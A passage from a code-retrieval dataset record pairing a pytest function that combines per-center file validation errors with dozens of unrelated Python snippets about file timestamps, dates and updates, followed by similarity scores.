date/month\r\n # Hence we arbitrarily assign one element as date and another as month\r\n if year != 0:\r\n # If the index of year is zero, we let the format to be same as it was assigned first\r\n # Else we arbitrarily assign '0' th index to month\r\n file_format[year] = '%Y'\r\n file_format[0] = '%m'\r\n file_format[3 - year] = '%d'\r\n return f'{file_format[0]}-{file_format[1]}-{file_format[2]}'", "def update( ):\r\n pass", "def change_modified_date(sbml):\n history = sbml.getModel().getModelHistory()\n if history:\n history.setModifiedDate(libsbml.Date(w3c_time()))\n # remove all but final modified date\n while history.getListModifiedDates().getSize() > 1:\n history.getListModifiedDates().remove(0)", "def up_to_date(db, args, pattern):\n\n any_out_of_date = False\n num_found_files = 0\n for arg in args:\n find_data = None\n try:\n find_data = eugene_sys.FindFiles(pattern(arg))\n\n num_found_files = num_found_files+len(find_data)\n except ValueError:\n #print(f\"couldn't open directory {arg} or no suitable files found within...\")\n continue\n\n for file in find_data:\n key = file['cFileName']\n record = file['ftLastWriteTime']\n\n if db.compareWithRecord(key, record): continue # Up-to-date\n\n db_record = db.readRecord(key)\n db.writeRecord(key, record)\n\n old = eugene_sys.GetDateTimeFormat(db_record) if db_record > 0 else \"(null)\"\n new = eugene_sys.GetDateTimeFormat(record)\n\n msg = f\"`{key}' not up to date\"\n msg += _PAD[len(msg):]\n\n print(f\"{msg} ({old} -> {new})...\")\n any_out_of_date = True\n\n # For the query to return a 'True' result\n # - No database record can be out-of-date\n # - At LEAST one file in the directories\n # given in 'args' must've matched the\n # pattern\n result = (num_found_files > 0) and not any_out_of_date\n\n if result: print(\" ...up to date!\")\n return result", "def change_files(self, files: list = None):\n if not is_empty_arr(files):\n self._files = files", "def _date(self, _date):\n\n self.__date = _date", "def _date(self, _date):\n\n self.__date = _date", "def update_version_files (component):\n\n vprint (\"Updating version files for \" + component)\n\n retval = []\n\n ## Update component/VERSION.txt\n path = get_path(component, \"VERSION.txt\")\n with open (path, \"r+\") as version_file:\n new_version = re.sub (component + \" version .*\",\n \"%s version %s, released %s\" % (component,\n comp_versions[component + \"_version\"],\n release_date),\n version_file.read ())\n if opts.take_action:\n version_file.seek (0)\n version_file.truncate (0)\n version_file.write (new_version)\n else:\n print (\"New version file for \" + component)\n print (new_version)\n\n vprint (\"Updating Version.h for \" + component)\n\n retval.append(path)\n\n ## Update COMPONENT/component/Version.h\n comp_l = len(component + \"_\")\n parts = {k[comp_l:]:v for (k, v) in comp_versions.items() if k.startswith(component)}\n parts[\"comp\"] = component\n version_header = \"\"\"\n// -*- C++ -*-\n// This is file was automatically generated by $ACE_ROOT/bin/make_release.py\n\n#define {comp}_MAJOR_VERSION {major}\n#define {comp}_MINOR_VERSION {minor}\n#define {comp}_MICRO_VERSION {micro}\n#define {comp}_VERSION \\\"{version}\\\"\n#define {comp}_VERSION_CODE 0x{code:x}\n#define {comp}_MAKE_VERSION_CODE(a,b,c) (((a) << 16) + ((b) << 8) + (c))\n\"\"\".format(**parts)\n\n path = get_path(component, component.lower (), \"Version.h\")\n if opts.take_action:\n with open (path, 'w+') as version_h:\n version_h.write (version_header)\n else:\n print (\"New Version.h for \" + component)\n print (version_header)\n\n retval.append(path)\n\n # Update component/PROBLEM-REPORT-FORM\n vprint (\"Updating PRF for \" + component)\n\n version_line_re = re.compile (r\"^\\s*(\\w+) +VERSION ?:\")\n path = get_path(component, \"PROBLEM-REPORT-FORM\")\n\n with open (path, 'r+') as prf:\n new_prf = \"\"\n for line in prf.readlines ():\n match = version_line_re.search (line)\n if match is not None:\n vprint (\"Found PRF Version for \" + match.group (1))\n new_version = comp_versions[match.group(1) + \"_version\"]\n line = version_re.sub (new_version, line)\n\n new_prf += line\n\n if opts.take_action:\n prf.seek (0)\n prf.truncate (0)\n prf.writelines (new_prf)\n else:\n print (\"New PRF for \" + component)\n print (\"\".join (new_prf))\n\n retval.append(path)\n\n return retval", "def date(self, new_date):\n self._date.date = new_date", "def process_single_date(self, input_filepath):\n # first see if there are already files in the output location\n # (in which case we can skip this date)\n\n # normally the coordinates will be part of the file path\n coords_string = find_coords_string(input_filepath)\n # if not though, we might have coords set explicitly\n if (not coords_string) and \"coords\" in vars(self):\n coords_string = \"{}_{}\".format(self.coords[0],self.coords[1])\n date_string = input_filepath.split(\"/\")[-2]\n if not re.search(\"[\\d]{4}-[\\d]{2}-[\\d]{2}\", date_string):\n if date_range in vars(self):\n date_string = fid_mid_period(self.date_range[0], self.date_range[1])\n else:\n date_String = None\n if not coords_string and date_string:\n raise RuntimeError(\"{}: coords and date need to be defined, through file path or explicitly set\")\n\n output_location = os.path.dirname(self.construct_image_savepath(date_string,\n coords_string))\n if (not self.replace_existing_files) and \\\n self.check_for_existing_files(output_location, self.num_files_per_point):\n return True\n \n print(\"Proceeding.\")\n print(input_filepath)\n print(self.input_location_type)\n \n # If no files already there, proceed.\n filenames = [filename for filename in self.list_directory(input_filepath,\n self.input_location_type) \\\n if filename.endswith(\".tif\")]\n\n # extract this to feed into `convert_to_rgb()`\n band_dict = {}\n for icol, col in enumerate('rgb'):\n band = self.RGB_bands[icol]\n filename = self.get_file(os.path.join(input_filepath,\n \"download.{}.tif\".format(band)),\n self.input_location_type)\n band_dict[col] = {\"band\": band,\n \"filename\": filename\n }\n\n print(filenames)\n tif_filebase = os.path.join(input_filepath, filenames[0].split('.')[0])\n\n # save the rgb image\n rgb_ok = self.save_rgb_image(band_dict,\n date_string,\n coords_string)\n if not rgb_ok:\n print(\"Problem with the rgb image?\")\n return False\n\n # save the NDVI image\n ndvi_tif = self.get_file(os.path.join(input_filepath,\n \"download.NDVI.tif\"),\n self.input_location_type)\n ndvi_image = scale_tif(ndvi_tif)\n ndvi_filepath = self.construct_image_savepath(date_string,\n coords_string,\n 'NDVI')\n self.save_image(ndvi_image,\n os.path.dirname(ndvi_filepath),\n os.path.basename(ndvi_filepath))\n\n # preprocess and threshold the NDVI image\n processed_ndvi = process_and_threshold(ndvi_image)\n ndvi_bw_filepath = self.construct_image_savepath(date_string,\n coords_string,\n 'BWNDVI')\n self.save_image(processed_ndvi,\n os.path.dirname(ndvi_bw_filepath),\n os.path.basename(ndvi_bw_filepath))\n\n # split and save sub-images\n self.split_and_save_sub_images(ndvi_image,\n date_string,\n coords_string,\n \"NDVI\")\n\n self.split_and_save_sub_images(processed_ndvi,\n date_string,\n coords_string,\n \"BWNDVI\")\n\n return True", "def check_auto_update(self):\n\n # pylint: disable=W0201\n\n if self.filename is None:\n return\n try:\n filename = self.filename\n timestamp = os.stat(self.filename).st_mtime\n if self.timestamp is None or self.timestamp < timestamp:\n logger.debug(\"Updating %s, timestamp %s\",\n filename, rpki.sundial.datetime.fromtimestamp(timestamp))\n f = open(filename, \"rb\")\n value = f.read()\n f.close()\n self.clear()\n if looks_like_PEM(value):\n self._set_PEM(value)\n else:\n self.DER = value\n self.filename = filename\n self.timestamp = timestamp\n except (IOError, OSError), e:\n now = rpki.sundial.now()\n if self.lastfail is None or now > self.lastfail + self.failure_threshold:\n logger.warning(\"Could not auto_update %r (last failure %s): %s\", self, self.lastfail, e)\n self.lastfail = now\n else:\n self.lastfail = None", "def update_source_files(source_directory_list, source_extension_list):\n # get source files in the directory list\n source_total = 0\n for unused, source_directory in enumerate(source_directory_list):\n source_files_list = []\n get_requested_files(source_directory, source_extension_list, source_files_list)\n # update the files with shared object references\n for unused, source_file in enumerate(source_files_list):\n updated_file = []\n file_changed = modify_input_file(source_file, updated_file)\n if file_changed:\n filepath = get_printble_filepath(source_file)\n print(filepath)\n source_total += 1\n if __file_update:\n write_output_file(updated_file, source_file)\n print(\"Total Files\", source_total)\n print()", "def update_args_with_file(files, args):\n args['files'] = {}\n for file_name in files:\n file = files[file_name]\n filename = file.filename\n args['files'][file_name] = filename\n return args", "def updateCache(self):\n for root, dirs, files in os.walk(cachedFilesPath):\n for file in files:\n if file.endswith(cachedFileExtensionSuffix):\n path = os.getcwd()+'/'+cachedFilesPath+file\n with open(path, mode='r') as f:\n payload_json = f.read()\n payload_obj=jsonpickle.decode(payload_json)\n r= self.upload(payload_obj)\n if isinstance(r, types.NoneType):\n #do nothing\n print(\"\")\n else:\n if r.status_code == 200 :\n #uploaded!\n if cacheArhive:\n #move it to archive\n dst=os.getcwd()+'/'+cachedArchivePath+file\n shutil.move(path, dst)\n print(\"archived log: \", file)\n else:\n #delete it\n os.remove(path)", "def _set_date(line, dirtydate, date):\n line = re.sub(dirtydate, date, line, 2)\n return line", "def update_timestamp():\n\n with open(\"timestamp.data\", \"r+\") as file:\n old = float(file.read())\n now = time.mktime(datetime.datetime.now().timetuple())\n file.seek(0)\n file.write(str(now))\n file.truncate()\n return old", "def update_files(self):\n try:\n db_files = self.dbc.get_file_list(self.remote_directory)\n except rest.ErrorResponse as e:\n print str(datetime.datetime.now()) \\\n + \": Could not get remote file list.\"\n print e.reason\n return False\n new_files = set(db_files) - self.file_set\n old_files = self.file_set - set(db_files)\n if new_files != set() or old_files != set():\n self.file_set = set(db_files)\n for filename in new_files:\n try:\n self.dbc.get_file(filename)\n except rest.ErrorResponse as e:\n print str(datetime.datetime.now()) + e.reason\n for filename in old_files:\n try:\n os.remove(self.local_directory + \"/\" + filename)\n except OSError:\n pass\n print str(datetime.datetime.now()) + \": Fileset changed:\"\n print self.file_set\n email_changes(new_files, old_files)\n print str(datetime.datetime.now()) \\\n + \": Email sent from update_files().\"\n return True\n return False", "def update():", "def update():", "def setDate(self, p_int, p_int_1, p_int_2): # real signature unknown; restored from __doc__\r\n return False", "def updateFileData(self):\n with open(pagePath(self.pageName)) as f:\n self.fileData = f.read()\n self.lastUpdated = time.time()", "def updatePullDate(self):\n self.startTime = datetime.now()", "def update_field_date(self, fieldid, name, namespace, require, modify, check, fill, remark):\n return self.mongo.db.userfield.update(\n {\n \"fields._id\":ObjectId(fieldid)\n },\n {\n '$set':\n {\n 'fields.$.name':name,\n 'fields.$.namespace':namespace,\n 'fields.$.require':bool(int(require)),\n 'fields.$.modify':bool(int(modify)),\n 'fields.$.check':bool(int(check)),\n 'fields.$.fill':bool(int(fill)),\n 'fields.$.remark':remark,\n }\n })", "def time_stamping(file):\n time_stamp = datetime.now().date()\n\n # 1st remove path like /home/\n path_file = file.split(\"/\")\n # 2nd removes file formats\n file_ = path_file[len(path_file)-1].split(\".\", 1)\n path_file.pop()\n # 3rd add time_stamp\n file_[0] = str(file_[0])+\"_\"+str(time_stamp)\n # 4th all is back together\n file = '.'.join(map(str, file_))\n\n path_file.append(file)\n file = '/'.join(map(str, path_file))\n print(file)\n return file", "def refresh(self):\n \n ffm = FlagFileManager(basedir=self.basedir)\n flagfiles = ffm.search(projectname=self.projectname)\n if flagfiles:\n self.tag = flagfiles[0].tag # we assume only 1 flagfile per project\n self.filename = '%s.%s.%s' %(self.projectname, self.timestamp, self.tag)", "def on_file_changed(self, path):\n\t\tpass", "def file_creation_date(file_path):\n ran_command = run_command([\"stat\", \"-f\", \"%SB\", file_path], True)\n raw_command_output = get_subprocess_output(ran_command)\n command_output = raw_command_output.strip(\"\\\\n\")\n elements = command_output.split(\" \")\n month_string = elements[0]\n month_number = 0\n day_number = int(elements[1])\n year_number = int(elements[3])\n if month_string == \"January\":\n month_number += 1\n elif month_string == \"February\":\n month_number += 2\n elif month_string == \"March\":\n month_number += 3\n elif month_string == \"April\":\n month_number += 4\n elif month_string == \"May\":\n month_number += 5\n elif month_string == \"June\":\n month_number += 6\n elif month_string == \"July\":\n month_number += 7\n elif month_string == \"August\":\n month_number += 8\n elif month_string == \"September\":\n month_number += 9\n elif month_string == \"October\":\n month_number += 10\n elif month_string == \"November\":\n month_number += 11\n elif month_string == \"December\":\n month_number += 12\n return [month_number, day_number, year_number]", "def update_data(self, url, file_name):\n if file_name == 'upcoming':\n r = self.gosu\n # Thread(target=self.update_upcoming_matches_teams, args=(r,)).start()\n else:\n r = requests.get(url)\n r = r.json()\n with open('files/' + file_name + '.json', 'w') as f:\n json.dump(r, f, indent=4)\n with open('files/' + file_name + '.txt', 'w') as f_: # update date\n f_.write(str(time.time()))", "def refresh(self):\n self.dir = dirs['app']\n ssBase = GPath(mwIniFile.getSetting('General','Screen Shot Base Name','ScreenShot'))\n if ssBase.head:\n self.dir = self.dir.join(ssBase.head)\n newData = {}\n reImageExt = re.compile(r'\\.(bmp|jpg)$',re.I)\n #--Loop over files in directory\n for fileName in self.dir.list():\n filePath = self.dir.join(fileName)\n maImageExt = reImageExt.search(fileName.s)\n if maImageExt and filePath.isfile(): \n newData[fileName] = (maImageExt.group(1).lower(),filePath.mtime)\n changed = (self.data != newData)\n self.data = newData\n return changed", "def _update_subfiles(self) -> None:\n\t\t# Clear list of subfiles\n\t\tself.subfiles.clear()\n\t\t# Iterate over Nodes\n\t\tfor node in self.nodes:\n\t\t\tfor file in node.get_subfiles():\n\t\t\t\tself.subfiles.add(\"{}/{}\".format(self.xml_dir, file))\n\t\t# Iterate over SubNodes\n\t\tfor subnode in self.subnodes:\n\t\t\tfor file in subnode.filenames:\n\t\t\t\tself.subfiles.add(\"{}/{}\".format(self.xml_dir, file))", "def process_file(self, filepath, only_if_updated=True):\n raise NotImplementedError()", "def __call__(self) -> str:\n self._set_dt_format()\n self._set_dt_string()\n return self._get_filepath()", "def update(self, filename, template_dir, cache_dir):\n\t\tself.cache_dir = cache_dir\n\t\tif filename.startswith('/'): self.template_file = filename\n\t\telse: self.template_file = os.path.join(template_dir,filename)\n\t\tself.cache_module = re.sub(\"[\\/\\\\\\.: ]\",'_',os.path.realpath(self.template_file))\n\t\tself.cache_file = os.path.join(cache_dir,self.cache_module) + '.py'", "def touch(*paths):\n\n for path in paths:\n if os.path.exists(path):\n os.utime(path, None)\n else:\n open(path, 'a').close()\n LOG.debug('touch {!r}'.format(path))", "def localfiles_for_update(self, localfiles, obsfiles):\n upload_local_files = []\n obs_dict = {}\n for key, mtime, size in obsfiles:\n obs_dict[key.strip('/')] = mtime\n\n for localfile in localfiles:\n filepath, key = localfile\n fullkey = key + '/' + os.path.basename(filepath)\n fullkey = fullkey.strip('/')\n if fullkey in obs_dict.keys():\n localfile_timestamp = os.path.getmtime(filepath)\n obsfile_timestamp = time.mktime(time.strptime(obs_dict[fullkey], \"%Y/%m/%d %H:%M:%S\"))\n\n if localfile_timestamp > obsfile_timestamp:\n upload_local_files.append(localfile)\n else:\n upload_local_files.append(localfile)\n return upload_local_files", "def store_file_mtime_in(source, output_filename):\n with open(output_filename, \"w\") as mtime_file:\n mtime_file.write(str(os.stat(source).st_mtime))", "def add(self, filename, source):\n self.cache[filename] = source\n if os.path.isfile(filename):\n self.ages[filename] = os.path.getmtime(filename) # modification time", "def get_file_age_default(path, cur_parsed, cur_datetime):\n\tmtime = datetime.fromtimestamp(os.path.getmtime(path))\n\tmtime = str(mtime).split(' ')[0]\n\tmtime = parse_date_str(mtime, '-', 0, 1, 2)\n\tprint(\"file mtime: {}\".format(mtime))\n\tdate_dif = date_dif_precomputed(cur_parsed[0], cur_parsed[1], cur_parsed[2], mtime[0], mtime[1], mtime[2])\n\treturn date_dif", "def resortFiles(fileList):\n if fileList is None or not len(fileList):\n print \"SRT:nofiles in the dictionary.\"\n sys.exit()\n\n new_file_list = list()\n for f in fileList:\n new_file_list.append(PFileStat(dir_source, f, os.lstat(dir_source + \"/\" + f)))\n\n new_file_list.sort(key=lambda i: i.st_mtime)\n return new_file_list", "def update(self, dt):\n pass", "def refreshMTimes(self):\n del self.mtimesReset[:]\n for fileName, fileInfo in self.data.items():\n oldMTime = self.mtimes.get(fileName,fileInfo.mtime)\n self.mtimes[fileName] = oldMTime\n #--Reset mtime?\n if fileInfo.mtime != oldMTime and oldMTime != -1:\n fileInfo.setMTime(oldMTime)\n self.mtimesReset.append(fileName)", "def up_to_date(self, gyp_file, target=None, **kw):\n raise NotImplementedError", "def add_date(self, date):\n with open(self.data_filepath, 'a', newline='') as writef:\n writer = csv.writer(writef)\n writer.writerow([date.freeze()])\n self._file_modified = True", "def _get_files_timestamps(self, working_dir: Union[str, os.PathLike]):\n return {f: os.path.getmtime(os.path.join(working_dir, f)) for f in os.listdir(working_dir)}", "def date_setup(date, page_offset, url,c):\r\n\r\n if date <= 10:\r\n page_offset = 0\r\n url = \"http://data.terapeak.com/?id=0&search=1&view=item_browse&query=iphone+5s&date=2015-02-1&date_range=1&buyer_country_id=1&condition=rollup_3&type%5Bfixed%5D=1&from_start_price=100&to_start_price=800&from_end_price=100&to_end_price=800&seller_country_id=1&txn_site_id=0&numPages=12&siteID=0&offset={0}\".format(page_offset)\r\n u = list(url)\r\n new = str(date)\r\n u[86] = new #this will update the date from date=2014-09-1 to date=2014-09-2\r\n date_ed_url = \"\".join(u)\r\n #print(edited)\r\n page_offset_update(date, page_offset, date_ed_url, c) # the date has now been updated and the page_offset has been reset to 0\r\n else:\r\n with open(\"5s_Feb_2015_.csv\", \"w\", newline='', encoding='UTF-8') as f:\r\n writer = csv.writer(f)\r\n writer.writerows(listof_listof_lists)\r\n print(\"done\")\r\n quit", "def test_verify_changed_source_file_adjust_mtime(self):\n\n # Get the atime and mtime of the file\n file_info = os.stat('testfiles/various_file_types/executable')\n\n # Set the atime and mtime of the file to the time that we collected, as on some systems\n # the times from a stat call don't match what a utime will set.\n os.utime('testfiles/various_file_types/executable', (file_info.st_atime, file_info.st_mtime))\n\n self.backup(u\"full\", u\"testfiles/various_file_types\", options=[])\n\n # Edit source file\n with open('testfiles/various_file_types/executable', 'r+') as f:\n f.write('This changes a source file.')\n\n # Set the atime and mtime for the file back to what it was prior to the edit\n os.utime('testfiles/various_file_types/executable', (file_info.st_atime, file_info.st_mtime))\n\n # Test verify for the file\n self.verify(u'testfiles/various_file_types/executable', file_to_verify=u'executable', options=[])", "def append_date_file(filename, search_str=\"----\", append_time=True, include_second=False,\n prepend=None):\n filename_final = \"\"\n if filename.find(search_str) >= 0:\n str_date, str_time = calc_date_time(include_sec=include_second)\n if append_time:\n if prepend and isinstance(prepend, str):\n filename_final = filename.replace(\n search_str, \"_\".join([prepend, str_date, str_time]))\n else:\n filename_final = filename.replace(\n search_str, \"_\".join([str_date, str_time]))\n else:\n if prepend and isinstance(prepend, str):\n filename_final = filename.replace(\n search_str, \"_\".join([prepend, str_date]))\n else:\n filename_final = filename.replace(\n search_str, str_date)\n else:\n filename_final = filename\n\n return filename_final", "def file_stat(self, file_path):", "def modified(filename: str) -> datetime.datetime:\n fs, relative_path = url_to_fs(filename)\n return cast(datetime.datetime, fs.modified(relative_path))" ]
[ "0.7073105", "0.6812823", "0.66919583", "0.6668282", "0.62575287", "0.6241051", "0.61830145", "0.6148155", "0.59413326", "0.5930518", "0.58680063", "0.5799601", "0.57853353", "0.5773595", "0.5749723", "0.57237613", "0.5706964", "0.57064885", "0.57048666", "0.56627303", "0.56627303", "0.56576204", "0.5645854", "0.56167793", "0.5600461", "0.5600461", "0.5573795", "0.557155", "0.5541764", "0.5538051", "0.55229753", "0.55177194", "0.55176914", "0.5507821", "0.55047345", "0.54638183", "0.54631966", "0.54631966", "0.54621494", "0.5451095", "0.5440372", "0.5426119", "0.5424368", "0.5395367", "0.5393714", "0.53884", "0.5388041", "0.5376307", "0.537221", "0.5362561", "0.53258765", "0.53080237", "0.5306047", "0.53035396", "0.5301897", "0.529589", "0.52952945", "0.52952945", "0.52948064", "0.5288764", "0.52886283", "0.5287184", "0.5282595", "0.52775234", "0.52747387", "0.5274722", "0.5273478", "0.52708936", "0.5265641", "0.5265641", "0.5263203", "0.5259155", "0.52537125", "0.52521235", "0.5251792", "0.5243818", "0.5242423", "0.52284735", "0.52167684", "0.5206416", "0.5205425", "0.52037543", "0.52034706", "0.5202606", "0.51992196", "0.51962286", "0.51955277", "0.51920444", "0.51902676", "0.5189365", "0.5184207", "0.5180948", "0.51808304", "0.51806957", "0.5180428", "0.5170732", "0.51653033", "0.5164557", "0.51570576", "0.51511395" ]
0.6030693
8
Test combining each center's file errors
def test__combine_center_file_errors(syn): expected_error = ( f"\t{ENT1.name} ({ENT1.id}):\n\nmy errors\nn\n\n" f"\t{ENT1.name} ({ENT1.id}):\n\nerrors here\nf\n\n" ) calls = [ mock.call("syn1234", downloadFile=False), mock.call("syn2345", downloadFile=False), ] with patch.object(syn, "get", return_value=ENT1) as patch_synget: center_errors = write_invalid_reasons._combine_center_file_errors( syn, CENTER_ERRORSDF ) assert center_errors == expected_error patch_synget.assert_has_calls(calls)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_single_error_merge(self):\n test_folder = base_path +'/test_data/merging_tests/error_test/'\n output_file = os.path.join(test_folder, \"output1.jpg\")\n\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"dummy.txt\", test_folder+\"background.jpg\", output_file))\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"render_small.png\", test_folder+\"background.jpg\", output_file))\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"render1.png\", test_folder+\"dummy.txt\", output_file))\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"render1.png\", test_folder+\"background_small.jpg\", output_file))\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"render1.png\", test_folder+\"background_large.jpg\", output_file))", "def test_get_center_invalid_errors(syn):\n with patch.object(\n syn, \"tableQuery\", return_value=QueryResponse\n ) as patch_query, patch.object(\n write_invalid_reasons, \"_combine_center_file_errors\", return_value=\"errors\"\n ) as patch_combine:\n center_invalid = write_invalid_reasons.get_center_invalid_errors(syn, \"syn3333\")\n assert center_invalid == {\"SAGE\": \"errors\", \"TEST\": \"errors\"}\n patch_query.assert_called_once_with(\"SELECT * FROM syn3333\")\n assert patch_combine.call_count == 2", "def test_strain_not_in_two_files(generate_no_strain_one_file):\n fname = generate_no_strain_one_file\n with pytest.raises(Exception):\n process_files([fname, fname])", "def generate_second_list_corrupted_files(directory):\n \n paths = [\"test\", \"dev\", \"train\"]\n corrupted_files = []\n\n for path in paths:\n files = [\n f\n for f in listdir(join(directory, path))\n if isfile(join(directory, path, f))\n ]\n\n total_files=len(files)\n processed_files = 0\n \n for file in files:\n processed_files+=1\n if \".wav\" in file: \n print(\"Checking files from \" + path + \" set \" + str(processed_files) + \"/\" + str(total_files), end=\"\\r\")\n if os.path.getsize(join(directory, path, file)) <= 0:\n corrupted_files.append(file)\n continue\n data, _ = soundfile.read(join(directory, path, file))\n if len(data) <= 0:\n corrupted_files.append(file)\n\n print()\n print(\"Done checking \" + path + \" set\")\n print(\"=====================\")\n\n with open('tuda_corrupted2.txt', 'w') as f:\n for file in corrupted_files:\n f.write(\"%s\\n\" % file)\n \n print(\"Done writing tuda_corrupted2.txt\" +\n \"Together with tuda_corrupted.txt they contain all corrupted files in Tuda-De\")\n print(\"=====================\")", "def verify_images(root_dir, root_listdir):\n counter = 0\n\n for index, image_dir in enumerate(root_listdir):\n images_listdir = os.listdir(root_dir + \"/\" + image_dir)\n list_of_images_indices = [\n image_index\n for image_index in range(3, len(images_listdir) - 1)\n if image_index % 2 == 0\n ]\n for image_ind in list_of_images_indices:\n filename = root_dir + \"/\" + image_dir + \"/\" + images_listdir[image_ind]\n try:\n im = Image.open(filename)\n im.verify()\n im.close()\n except (OSError, ValueError):\n counter += 1\n\n print(\"%d files caused error due to OSError and ValueError.\" % counter)", "def testError(self):\n cmds = \"\"\"chown 0 missingFile\npwd\nexit\n\"\"\"\n\n def _cbCheckResult(res):\n self.assertNotIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def check_training_result_files(folder, ruleset, quiet, werror):\n\n too_many_errors = False\n result_folder = os.path.join(folder, 'results')\n for system_folder in _get_sub_folders(result_folder):\n for benchmark_folder in _get_sub_folders(system_folder):\n folder_parts = benchmark_folder.split('/')\n benchmark = folder_parts[-1]\n system = folder_parts[-2]\n\n # If it is not a recognized benchmark, skip further checks.\n if benchmark not in _ALLOWED_BENCHMARKS:\n print('Skipping benchmark: {}'.format(benchmark))\n continue\n\n # Find all result files for this benchmark.\n pattern = '{folder}/result_*.txt'.format(folder=benchmark_folder)\n result_files = glob.glob(pattern, recursive=True)\n\n # No result files were found. That is okay, because the organization\n # may not have submitted any results for this benchmark.\n if not result_files:\n print('No Result Files!')\n continue\n\n _print_divider_bar()\n print('System {}'.format(system))\n print('Benchmark {}'.format(benchmark))\n\n # If the organization did submit results for this benchmark, the number\n # of result files must be an exact number.\n if len(result_files) != _EXPECTED_RESULT_FILE_COUNTS[benchmark]:\n print('Expected {} runs, but detected {} runs.'.format(\n _EXPECTED_RESULT_FILE_COUNTS[benchmark],\n len(result_files)))\n\n errors_found = 0\n result_files.sort()\n for result_file in result_files:\n result_basename = os.path.basename(result_file)\n result_name, _ = os.path.splitext(result_basename)\n run = result_name.split('_')[-1]\n\n # For each result file, run the benchmark's compliance checks.\n _print_divider_bar()\n print('Run {}'.format(run))\n config_file = '{ruleset}/common.yaml'.format(\n ruleset=ruleset,\n benchmark=benchmark)\n checker = mlp_compliance.make_checker(\n ruleset=ruleset,\n quiet=quiet,\n werror=werror)\n valid, _, _, _ = mlp_compliance.main(result_file, config_file, checker)\n if not valid:\n errors_found += 1\n if errors_found == 1:\n print('WARNING: One file does not comply.')\n print('WARNING: Allowing this failure under olympic scoring rules.')\n if errors_found > 1:\n too_many_errors = True\n\n _print_divider_bar()\n if too_many_errors:\n raise Exception('Found too many errors in logging, see log above for details.')", "def assert_filenames(self):\n print(\"Asserting filenames: \", end=\"\")\n error_files = []\n\n for data_dir in data_settings.BLOCK_DATA_DIRS:\n\n filenames = os.listdir(data_dir)\n\n for filename in filenames:\n\n if 'aux.xml' in filename or 'yield':\n\n continue\n\n try:\n\n filename_split = filename.split(\"_\")\n date = filename_split[0]\n _, suffix = filename_split[-1].split(\".\")\n\n assert suffix == 'tif', \"Wrong file suffix\"\n assert len(date) == 8, \"Wrong amount of numbers in date\"\n assert date[0:4] == '2017', \"Year is wrong\"\n assert date[4] == '0', \"No double digit months in dataset\"\n assert date[5] in ['4', '5', '6', '7', '8',\n '9'], \"Month outside dataset range\"\n assert date[6] in ['0', '1', '2',\n '3'], \"Ten-indicator for day is wrong\"\n assert date[7] in ['0', '1', '2', '3', '4', '5',\n '6', '7', '8', '9'], \"Date is not a digit\"\n assert 'ndvi' in filename or 'drone_rgb' in filename or 'drone_ndvi' in filename, \"Proper type is missing\"\n\n if 'sentinel_ndvi' in filename:\n\n assert len(filename) == 26, \"Filename wrong for {} in {}\".format(\n filename, data_dir)\n\n if 'drone_ndvi' in filename:\n\n assert len(filename) == 23, \"Filename wrong for {} in {}\".format(\n filename, data_dir)\n\n if 'drone_rgb' in filename:\n\n assert len(filename) == 22, \"Filename wrong for {} in {}\".format(\n filename, data_dir)\n\n except (AssertionError, ValueError) as ex:\n\n error_files.append(\"{}: {}\".format(\n ex, os.path.join(data_dir, filename)))\n\n if not error_files:\n\n print(\"All generated block datasets named correctly!\")\n\n else:\n\n print(\"There were some problems with the following files\")\n\n for error_file in error_files:\n print(\"\\t{}\".format(error_file))", "def check_comps(root, comps):\n for key, comp in comps.items():\n\n filename = os.path.join(root, comp['filename'])\n if not os.path.isfile(filename):\n warnings.warn(\n 'The file {0} could not be found'.format(filename))", "def test_verify_corrupt_archive(self):\n self.backup(u\"full\", u\"testfiles/various_file_types\", options=[])\n output_files = os.listdir(\"testfiles/output\")\n archives = [elem for elem in output_files if \"vol\" in elem]\n for archive in archives:\n # Edit source file\n with open(\"testfiles/output/\" + archive, 'r+') as f:\n f.write('This writes text into each archive file to corrupt it.')\n # Test verify for the file\n try:\n self.verify(u'testfiles/various_file_types/executable', file_to_verify=u'executable', options=[])\n except CmdError as e:\n # Should return a 21 error code for \"hash mismatch\"\n self.assertEqual(e.exit_status, 21, str(e))\n else:\n self.fail('Expected Hash Mismatch Error not thrown')", "def test_stress_strain_both_files(generate_two_files_both_stress_strain):\n fname = generate_two_files_both_stress_strain\n with pytest.raises(Exception):\n process_files([fname[0],fname[1]])", "def combine(files, output):\n # read all files\n bxrs = [h5py.File(f,'r') for f in files]\n # some paths we might care about & will copy\n metadata_paths = [\n '3BRecInfo/3BRecVars/MaxVolt',\n '3BRecInfo/3BRecVars/MinVolt',\n '3BRecInfo/3BRecVars/BitDepth',\n '3BRecInfo/3BRecVars/SignalInversion',\n '3BRecInfo/3BRecVars/SamplingRate',\n '3BRecInfo/3BRecVars/ExperimentType',\n '3BRecInfo/3BMeaChip/NRows',\n '3BRecInfo/3BMeaChip/NCols',\n '3BRecInfo/3BMeaChip/Layout',\n '3BRecInfo/3BMeaChip/MeaType',\n '3BRecInfo/3BMeaSystem/FwVersion',\n '3BRecInfo/3BMeaSystem/HwVersion',\n '3BRecInfo/3BMeaSystem/System'\n ]\n\n # count n_frames, n_samples from each file\n # also verify that key metadata matches\n n_frames = bxrs[0]['3BRecInfo/3BRecVars/NRecFrames'][0]\n n_samples = [bxrs[0]['3BData/Raw'].shape[0]]\n sampling_rate = bxrs[0]['3BRecInfo/3BRecVars/SamplingRate'][0]\n print(\"checking that all brw files have matching metadata\")\n for b in bxrs[1:]:\n for m in metadata_paths:\n try:\n if len(bxrs[0][m])==1:\n assert bxrs[0][m][:] == b[m][:]\n else:\n assert np.all(bxrs[0][m][:] == b[m][:])\n except Exception as E:\n logger.warn(f\"\"\"metadata does not match for {m}:\n found {bxrs[0][m]} and {b[m]}\n \"\"\")\n n_frames += b['3BRecInfo/3BRecVars/NRecFrames'][0]\n n_samples.append(b[\"3BData/Raw\"].shape[0])\n print(f\"combined duration: {n_frames/sampling_rate/60:.2f} minutes\")\n\n out_bxr = h5py.File(output, \"w\")\n # copy metadata\n bxrs[0].visititems(partial(glia.copy_metadata, 